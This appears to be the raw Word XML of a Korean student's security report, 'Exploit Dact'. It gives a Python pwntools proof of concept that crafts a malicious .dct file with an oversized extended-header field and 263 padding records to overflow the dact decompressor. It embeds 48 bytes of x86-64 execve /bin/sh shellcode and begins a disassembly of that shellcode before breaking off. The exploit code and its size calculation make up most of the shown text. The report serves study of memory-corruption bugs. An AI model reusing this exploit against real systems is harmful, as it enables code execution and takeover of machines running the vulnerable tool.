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78E6B" w14:textId="4DC3DC86" w:rsidR="00C86D32" w:rsidRDefault="000F0AEC" w:rsidP="000F0AEC">
      <w:pPr>
        <w:jc w:val="center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4.01.</w:t>
      </w:r>
      <w:r w:rsidR="004C0B9A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>22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보고서</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D4043A5" w14:textId="7BEAF7BC" w:rsidR="000F0AEC" w:rsidRDefault="000F0AEC" w:rsidP="000F0AEC">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">서강대학교 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">20191244 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>김현승</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="237C5F5A" w14:textId="25AF48E5" w:rsidR="000F0AEC" w:rsidRDefault="000F0AEC" w:rsidP="000F0AEC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>E</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>xploit Dact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11FAF127" w14:textId="1283E599" w:rsidR="001562BE" w:rsidRDefault="00FF06FE" w:rsidP="000F0AEC">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">이전 보고서에서 </w:t>
      </w:r>
      <w:r w:rsidR="007C5A65">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>확인한 사실을 기반으로 P</w:t>
      </w:r>
      <w:r w:rsidR="007C5A65">
        <w:t xml:space="preserve">oC </w:t>
      </w:r>
      <w:r w:rsidR="007C5A65">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>코드를 작성해</w:t>
      </w:r>
      <w:r w:rsidR="001562BE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>보았다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B35ACD1" w14:textId="77777777" w:rsidR="001562BE" w:rsidRPr="001562BE" w:rsidRDefault="001562BE" w:rsidP="001562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562BE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#!/usr/bin/env python3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25339423" w14:textId="77777777" w:rsidR="001562BE" w:rsidRPr="001562BE" w:rsidRDefault="001562BE" w:rsidP="001562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562BE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import</w:t>
      </w:r>
      <w:r w:rsidRPr="001562B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1562BE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sys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C6BDC2" w14:textId="77777777" w:rsidR="001562BE" w:rsidRPr="001562BE" w:rsidRDefault="001562BE" w:rsidP="001562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562BE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import</w:t>
      </w:r>
      <w:r w:rsidRPr="001562B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1562BE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os</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="516A9A69" w14:textId="77777777" w:rsidR="001562BE" w:rsidRPr="001562BE" w:rsidRDefault="001562BE" w:rsidP="001562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562BE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from</w:t>
      </w:r>
      <w:r w:rsidRPr="001562B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pwn </w:t>
      </w:r>
      <w:r w:rsidRPr="001562BE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import</w:t>
      </w:r>
      <w:r w:rsidRPr="001562B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1562BE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*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B28D4F" w14:textId="77777777" w:rsidR="001562BE" w:rsidRPr="001562BE" w:rsidRDefault="001562BE" w:rsidP="001562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39E3B70A" w14:textId="77777777" w:rsidR="001562BE" w:rsidRPr="001562BE" w:rsidRDefault="001562BE" w:rsidP="001562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562BE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def</w:t>
      </w:r>
      <w:r w:rsidRPr="001562B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1562BE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write_fixed_header</w:t>
      </w:r>
      <w:r w:rsidRPr="001562B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1562B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fd</w:t>
      </w:r>
      <w:r w:rsidRPr="001562B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 :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF1BBF8" w14:textId="77777777" w:rsidR="001562BE" w:rsidRPr="001562BE" w:rsidRDefault="001562BE" w:rsidP="001562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562B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1562B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fd</w:t>
      </w:r>
      <w:r w:rsidRPr="001562B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.write(</w:t>
      </w:r>
      <w:r w:rsidRPr="001562BE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b</w:t>
      </w:r>
      <w:r w:rsidRPr="001562BE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1562BE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="굴림" w:hAnsi="Consolas" w:cs="굴림"/>
          <w:color w:val="D7BA7D"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>\x44\x43\x54\xc3</w:t>
      </w:r>
      <w:r w:rsidRPr="001562BE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1562B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                    </w:t>
      </w:r>
      <w:r w:rsidRPr="001562BE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# magic[4]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C518EC" w14:textId="77777777" w:rsidR="001562BE" w:rsidRPr="001562BE" w:rsidRDefault="001562BE" w:rsidP="001562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562B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1562B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fd</w:t>
      </w:r>
      <w:r w:rsidRPr="001562B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.write(</w:t>
      </w:r>
      <w:r w:rsidRPr="001562BE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b</w:t>
      </w:r>
      <w:r w:rsidRPr="001562BE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1562BE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="굴림" w:hAnsi="Consolas" w:cs="굴림"/>
          <w:color w:val="D7BA7D"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>\x00\x08\x2a</w:t>
      </w:r>
      <w:r w:rsidRPr="001562BE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1562B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                        </w:t>
      </w:r>
      <w:r w:rsidRPr="001562BE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# version[3]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F59EB14" w14:textId="77777777" w:rsidR="001562BE" w:rsidRPr="001562BE" w:rsidRDefault="001562BE" w:rsidP="001562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562B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1562B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fd</w:t>
      </w:r>
      <w:r w:rsidRPr="001562B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.write(</w:t>
      </w:r>
      <w:r w:rsidRPr="001562BE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b</w:t>
      </w:r>
      <w:r w:rsidRPr="001562BE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1562BE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="굴림" w:hAnsi="Consolas" w:cs="굴림"/>
          <w:color w:val="D7BA7D"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>\x00\x00\x00\x00\xff\xff\xff\xff</w:t>
      </w:r>
      <w:r w:rsidRPr="001562BE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1562B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    </w:t>
      </w:r>
      <w:r w:rsidRPr="001562BE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# filesize[8]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="479C33D5" w14:textId="77777777" w:rsidR="001562BE" w:rsidRPr="001562BE" w:rsidRDefault="001562BE" w:rsidP="001562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562B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1562B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fd</w:t>
      </w:r>
      <w:r w:rsidRPr="001562B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.write(</w:t>
      </w:r>
      <w:r w:rsidRPr="001562BE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b</w:t>
      </w:r>
      <w:r w:rsidRPr="001562BE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1562BE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="굴림" w:hAnsi="Consolas" w:cs="굴림"/>
          <w:color w:val="D7BA7D"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>\x10\x00\x00\x00</w:t>
      </w:r>
      <w:r w:rsidRPr="001562BE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1562B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                    </w:t>
      </w:r>
      <w:r w:rsidRPr="001562BE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# blk_cnt[4]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E7D5CDA" w14:textId="77777777" w:rsidR="001562BE" w:rsidRPr="001562BE" w:rsidRDefault="001562BE" w:rsidP="001562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562B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1562B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fd</w:t>
      </w:r>
      <w:r w:rsidRPr="001562B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.write(</w:t>
      </w:r>
      <w:r w:rsidRPr="001562BE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b</w:t>
      </w:r>
      <w:r w:rsidRPr="001562BE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1562BE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="굴림" w:hAnsi="Consolas" w:cs="굴림"/>
          <w:color w:val="D7BA7D"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>\x10\x00\x00\x00</w:t>
      </w:r>
      <w:r w:rsidRPr="001562BE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1562B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                    </w:t>
      </w:r>
      <w:r w:rsidRPr="001562BE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# blksize_uncomp[4]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A5FF54E" w14:textId="77777777" w:rsidR="001562BE" w:rsidRPr="001562BE" w:rsidRDefault="001562BE" w:rsidP="001562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562B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1562B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fd</w:t>
      </w:r>
      <w:r w:rsidRPr="001562B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.write(</w:t>
      </w:r>
      <w:r w:rsidRPr="001562BE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b</w:t>
      </w:r>
      <w:r w:rsidRPr="001562BE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1562BE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="굴림" w:hAnsi="Consolas" w:cs="굴림"/>
          <w:color w:val="D7BA7D"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>\x00</w:t>
      </w:r>
      <w:r w:rsidRPr="001562BE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1562B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                                </w:t>
      </w:r>
      <w:r w:rsidRPr="001562BE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# file_opts[1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E529093" w14:textId="796A75EC" w:rsidR="001562BE" w:rsidRPr="001562BE" w:rsidRDefault="001562BE" w:rsidP="001562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562B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1562B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fd</w:t>
      </w:r>
      <w:r w:rsidRPr="001562B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.write(</w:t>
      </w:r>
      <w:r w:rsidRPr="001562BE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b</w:t>
      </w:r>
      <w:r w:rsidRPr="001562BE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1562BE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="굴림" w:hAnsi="Consolas" w:cs="굴림"/>
          <w:color w:val="D7BA7D"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>\x00\x00\x04\x</w:t>
      </w:r>
      <w:r w:rsidR="00AF4A3A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="굴림" w:hAnsi="Consolas" w:cs="굴림"/>
          <w:color w:val="D7BA7D"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00080312">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="굴림" w:hAnsi="Consolas" w:cs="굴림"/>
          <w:color w:val="D7BA7D"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
      <w:r w:rsidRPr="001562BE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1562B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    </w:t>
      </w:r>
      <w:r w:rsidRPr="001562BE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# file_extd_size[4] &lt;&lt; Important</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="108105B6" w14:textId="77777777" w:rsidR="001562BE" w:rsidRPr="001562BE" w:rsidRDefault="001562BE" w:rsidP="001562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40C4D455" w14:textId="77777777" w:rsidR="001562BE" w:rsidRPr="001562BE" w:rsidRDefault="001562BE" w:rsidP="001562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562BE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def</w:t>
      </w:r>
      <w:r w:rsidRPr="001562B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1562BE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write_url_data</w:t>
      </w:r>
      <w:r w:rsidRPr="001562B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1562B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fd</w:t>
      </w:r>
      <w:r w:rsidRPr="001562B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 :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A12AA14" w14:textId="77777777" w:rsidR="001562BE" w:rsidRPr="001562BE" w:rsidRDefault="001562BE" w:rsidP="001562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562B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1562BE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for</w:t>
      </w:r>
      <w:r w:rsidRPr="001562B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1562B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</w:t>
      </w:r>
      <w:r w:rsidRPr="001562B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1562BE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in</w:t>
      </w:r>
      <w:r w:rsidRPr="001562B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1562BE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range</w:t>
      </w:r>
      <w:r w:rsidRPr="001562B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1562BE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1562B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1562BE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263</w:t>
      </w:r>
      <w:r w:rsidRPr="001562B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 :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19139C02" w14:textId="77777777" w:rsidR="001562BE" w:rsidRPr="001562BE" w:rsidRDefault="001562BE" w:rsidP="001562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562B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62B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fd</w:t>
      </w:r>
      <w:r w:rsidRPr="001562B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.write(</w:t>
      </w:r>
      <w:r w:rsidRPr="001562BE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b</w:t>
      </w:r>
      <w:r w:rsidRPr="001562BE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1562BE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="굴림" w:hAnsi="Consolas" w:cs="굴림"/>
          <w:color w:val="D7BA7D"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>\x07</w:t>
      </w:r>
      <w:r w:rsidRPr="001562BE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1562B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                            </w:t>
      </w:r>
      <w:r w:rsidRPr="001562BE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# ch[1] (DACT_HDR_URL)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2054AAEE" w14:textId="77777777" w:rsidR="001562BE" w:rsidRPr="001562BE" w:rsidRDefault="001562BE" w:rsidP="001562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562B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62B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fd</w:t>
      </w:r>
      <w:r w:rsidRPr="001562B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.write(</w:t>
      </w:r>
      <w:r w:rsidRPr="001562BE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b</w:t>
      </w:r>
      <w:r w:rsidRPr="001562BE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1562BE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="굴림" w:hAnsi="Consolas" w:cs="굴림"/>
          <w:color w:val="D7BA7D"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>\x00\x01</w:t>
      </w:r>
      <w:r w:rsidRPr="001562BE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1562B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                        </w:t>
      </w:r>
      <w:r w:rsidRPr="001562BE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# x[2] (size 1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B2E3AC2" w14:textId="77777777" w:rsidR="001562BE" w:rsidRPr="001562BE" w:rsidRDefault="001562BE" w:rsidP="001562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562B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62B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fd</w:t>
      </w:r>
      <w:r w:rsidRPr="001562B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.write(</w:t>
      </w:r>
      <w:r w:rsidRPr="001562BE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b</w:t>
      </w:r>
      <w:r w:rsidRPr="001562BE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"a"</w:t>
      </w:r>
      <w:r w:rsidRPr="001562B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)                               </w:t>
      </w:r>
      <w:r w:rsidRPr="001562BE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# dummy data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67911D8F" w14:textId="77777777" w:rsidR="001562BE" w:rsidRPr="001562BE" w:rsidRDefault="001562BE" w:rsidP="001562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4527E52B" w14:textId="77777777" w:rsidR="001562BE" w:rsidRPr="001562BE" w:rsidRDefault="001562BE" w:rsidP="001562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562B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1562B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fd</w:t>
      </w:r>
      <w:r w:rsidRPr="001562B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.write(</w:t>
      </w:r>
      <w:r w:rsidRPr="001562BE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b</w:t>
      </w:r>
      <w:r w:rsidRPr="001562BE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1562BE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="굴림" w:hAnsi="Consolas" w:cs="굴림"/>
          <w:color w:val="D7BA7D"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>\x07</w:t>
      </w:r>
      <w:r w:rsidRPr="001562BE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1562B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268F83E1" w14:textId="77777777" w:rsidR="001562BE" w:rsidRPr="001562BE" w:rsidRDefault="001562BE" w:rsidP="001562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562B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1562B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fd</w:t>
      </w:r>
      <w:r w:rsidRPr="001562B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.write(</w:t>
      </w:r>
      <w:r w:rsidRPr="001562BE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b</w:t>
      </w:r>
      <w:r w:rsidRPr="001562BE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1562BE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="굴림" w:hAnsi="Consolas" w:cs="굴림"/>
          <w:color w:val="D7BA7D"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>\x00\x30</w:t>
      </w:r>
      <w:r w:rsidRPr="001562BE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1562B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6AC31FBC" w14:textId="77777777" w:rsidR="001562BE" w:rsidRPr="001562BE" w:rsidRDefault="001562BE" w:rsidP="001562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562B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1562BE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# shellcode[48]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA556B2" w14:textId="77777777" w:rsidR="001562BE" w:rsidRPr="001562BE" w:rsidRDefault="001562BE" w:rsidP="001562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562B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1562B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fd</w:t>
      </w:r>
      <w:r w:rsidRPr="001562B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.write(</w:t>
      </w:r>
      <w:r w:rsidRPr="001562BE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b</w:t>
      </w:r>
      <w:r w:rsidRPr="001562BE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1562BE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="굴림" w:hAnsi="Consolas" w:cs="굴림"/>
          <w:color w:val="D7BA7D"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>\x6a\x68\x48\xb8\x2f\x62\x69\x6e\x2f\x2f\x2f\x73\x50\x48\x89\xe7\x68\x72\x69\x01\x01\x81\x34\x24\x01\x01\x01\x01\x31\xf6\x56\x6a\x08\x5e\x48\x01\xe6\x56\x48\x89\xe6\x31\xd2\x6a\x3b\x58\x0f\x05</w:t>
      </w:r>
      <w:r w:rsidRPr="001562BE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1562B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13FBDDFB" w14:textId="77777777" w:rsidR="001562BE" w:rsidRPr="001562BE" w:rsidRDefault="001562BE" w:rsidP="001562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407FAE91" w14:textId="77777777" w:rsidR="001562BE" w:rsidRPr="001562BE" w:rsidRDefault="001562BE" w:rsidP="001562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562BE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if</w:t>
      </w:r>
      <w:r w:rsidRPr="001562B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1562B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__name__</w:t>
      </w:r>
      <w:r w:rsidRPr="001562B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1562BE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==</w:t>
      </w:r>
      <w:r w:rsidRPr="001562B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1562BE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"__main__"</w:t>
      </w:r>
      <w:r w:rsidRPr="001562B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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D58B5FB" w14:textId="77777777" w:rsidR="001562BE" w:rsidRPr="001562BE" w:rsidRDefault="001562BE" w:rsidP="001562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562B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1562B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fd</w:t>
      </w:r>
      <w:r w:rsidRPr="001562B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1562BE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1562B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1562BE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open</w:t>
      </w:r>
      <w:r w:rsidRPr="001562B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1562BE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"./test.dct"</w:t>
      </w:r>
      <w:r w:rsidRPr="001562B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1562BE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"wb"</w:t>
      </w:r>
      <w:r w:rsidRPr="001562B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4F4A5F0F" w14:textId="77777777" w:rsidR="001562BE" w:rsidRPr="001562BE" w:rsidRDefault="001562BE" w:rsidP="001562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562B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1562BE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write_fixed_header</w:t>
      </w:r>
      <w:r w:rsidRPr="001562B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1562B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fd</w:t>
      </w:r>
      <w:r w:rsidRPr="001562B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732DAC78" w14:textId="77777777" w:rsidR="001562BE" w:rsidRPr="001562BE" w:rsidRDefault="001562BE" w:rsidP="001562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562B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1562BE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write_url_data</w:t>
      </w:r>
      <w:r w:rsidRPr="001562B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1562B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fd</w:t>
      </w:r>
      <w:r w:rsidRPr="001562B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3A3E789F" w14:textId="77777777" w:rsidR="001562BE" w:rsidRPr="001562BE" w:rsidRDefault="001562BE" w:rsidP="001562B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562B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1562B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fd</w:t>
      </w:r>
      <w:r w:rsidRPr="001562B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1562BE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close</w:t>
      </w:r>
      <w:r w:rsidRPr="001562B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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A63D83" w14:textId="77777777" w:rsidR="001562BE" w:rsidRPr="001562BE" w:rsidRDefault="001562BE" w:rsidP="001562BE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1562B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1562BE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os</w:t>
      </w:r>
      <w:r w:rsidRPr="001562B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1562BE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system</w:t>
      </w:r>
      <w:r w:rsidRPr="001562B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1562BE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"./dact_exploit -dcf test.dct"</w:t>
      </w:r>
      <w:r w:rsidRPr="001562B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0549FDD7" w14:textId="10FCDEAA" w:rsidR="001562BE" w:rsidRDefault="00DF390F" w:rsidP="000F0AEC">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>w</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">rite_fixed_header </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">함수에서 </w:t>
      </w:r>
      <w:r w:rsidR="008F7005">
        <w:t xml:space="preserve">.dct </w:t>
      </w:r>
      <w:r w:rsidR="008F7005">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>파일의 고정적인 헤더 부분을 작성하고 있다.</w:t>
      </w:r>
      <w:r w:rsidR="008F7005">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008F7005">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>m</w:t>
      </w:r>
      <w:r w:rsidR="008F7005">
        <w:t>agic, version</w:t>
      </w:r>
      <w:r w:rsidR="008F7005">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>은 h</w:t>
      </w:r>
      <w:r w:rsidR="008F7005">
        <w:t>ello.txt.dct</w:t>
      </w:r>
      <w:r w:rsidR="008F7005">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>가 갖고 있는 값을 그대로 사용했고,</w:t>
      </w:r>
      <w:r w:rsidR="008F7005">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008F7005">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>나머지 부분은 임의로 작성하였다.</w:t>
      </w:r>
      <w:r w:rsidR="008F7005">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008F7005">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
      <w:r w:rsidR="008F7005">
        <w:t>ile_extd_size</w:t>
      </w:r>
      <w:r w:rsidR="008F7005">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>는 w</w:t>
      </w:r>
      <w:r w:rsidR="008F7005">
        <w:t>hile loop</w:t>
      </w:r>
      <w:r w:rsidR="008F7005">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>이 반복되는 횟수와 관련이 있으므로 데이터의 크기를 고려해 사용해야한다.</w:t>
      </w:r>
      <w:r w:rsidR="008F7005">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009647B7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="009647B7">
        <w:t>63</w:t>
      </w:r>
      <w:r w:rsidR="009647B7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">번 반복하며 </w:t>
      </w:r>
      <w:r w:rsidR="009647B7">
        <w:t xml:space="preserve">url </w:t>
      </w:r>
      <w:r w:rsidR="009647B7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidR="009647B7">
        <w:t>ata</w:t>
      </w:r>
      <w:r w:rsidR="009647B7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">를 작성할 때 x를 </w:t>
      </w:r>
      <w:r w:rsidR="009647B7">
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="009647B7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>로 설정했으므로 매 반복마다 f</w:t>
      </w:r>
      <w:r w:rsidR="009647B7">
        <w:t>ile_extd_read</w:t>
      </w:r>
      <w:r w:rsidR="009647B7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">는 </w:t>
      </w:r>
      <w:r w:rsidR="003C47A9">
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="003C47A9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>가</w:t>
      </w:r>
      <w:r w:rsidR="009647B7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 증가한다.</w:t>
      </w:r>
      <w:r w:rsidR="009647B7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003C47A9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">따라서 </w:t>
      </w:r>
      <w:r w:rsidR="003C47A9">
        <w:t>4 x 263 = 1052</w:t>
      </w:r>
      <w:r w:rsidR="003C47A9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>이고,</w:t>
      </w:r>
      <w:r w:rsidR="003C47A9">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003C47A9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="003C47A9">
        <w:t>64</w:t>
      </w:r>
      <w:r w:rsidR="003C47A9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">번째 반복에서 입력되는 쉘코드의 크기가 </w:t>
      </w:r>
      <w:r w:rsidR="003C47A9">
        <w:t>48</w:t>
      </w:r>
      <w:r w:rsidR="00080312">
        <w:t>(+3</w:t>
      </w:r>
      <w:r w:rsidR="00080312">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">을 해주면 </w:t>
      </w:r>
      <w:r w:rsidR="00080312">
        <w:t>51)</w:t>
      </w:r>
      <w:r w:rsidR="003C47A9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>이므</w:t>
      </w:r>
      <w:r w:rsidR="003C47A9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">로 </w:t>
      </w:r>
      <w:r w:rsidR="00AF4A3A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
      <w:r w:rsidR="00AF4A3A">
        <w:t>ile_extd_size</w:t>
      </w:r>
      <w:r w:rsidR="00AF4A3A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">는 </w:t>
      </w:r>
      <w:r w:rsidR="003C47A9">
        <w:t>110</w:t>
      </w:r>
      <w:r w:rsidR="00080312">
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="003C47A9">
        <w:t>(0x</w:t>
      </w:r>
      <w:r w:rsidR="00AF4A3A">
        <w:t>44</w:t>
      </w:r>
      <w:r w:rsidR="00080312">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
      <w:r w:rsidR="00AF4A3A">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00AF4A3A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>가 되어야 한다.</w:t>
      </w:r>
      <w:r w:rsidR="00AF4A3A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000849AF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>여기서 사용한 쉘코드는 다음과 같다.</w:t>
      </w:r>
      <w:r w:rsidR="000849AF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="175CBA98" w14:textId="77777777" w:rsidR="00897A0B" w:rsidRDefault="00897A0B" w:rsidP="00897A0B">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:firstLineChars="200" w:firstLine="400"/>
      </w:pPr>
      <w:r>
        <w:t>1129:</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">6a 68                </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>push   $0x68</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B6F2040" w14:textId="77777777" w:rsidR="00897A0B" w:rsidRDefault="00897A0B" w:rsidP="00897A0B">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    112b:</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">48 b8 2f 62 69 6e 2f </w:t>
      </w:r>
      <w:r>
        <w:tab/>
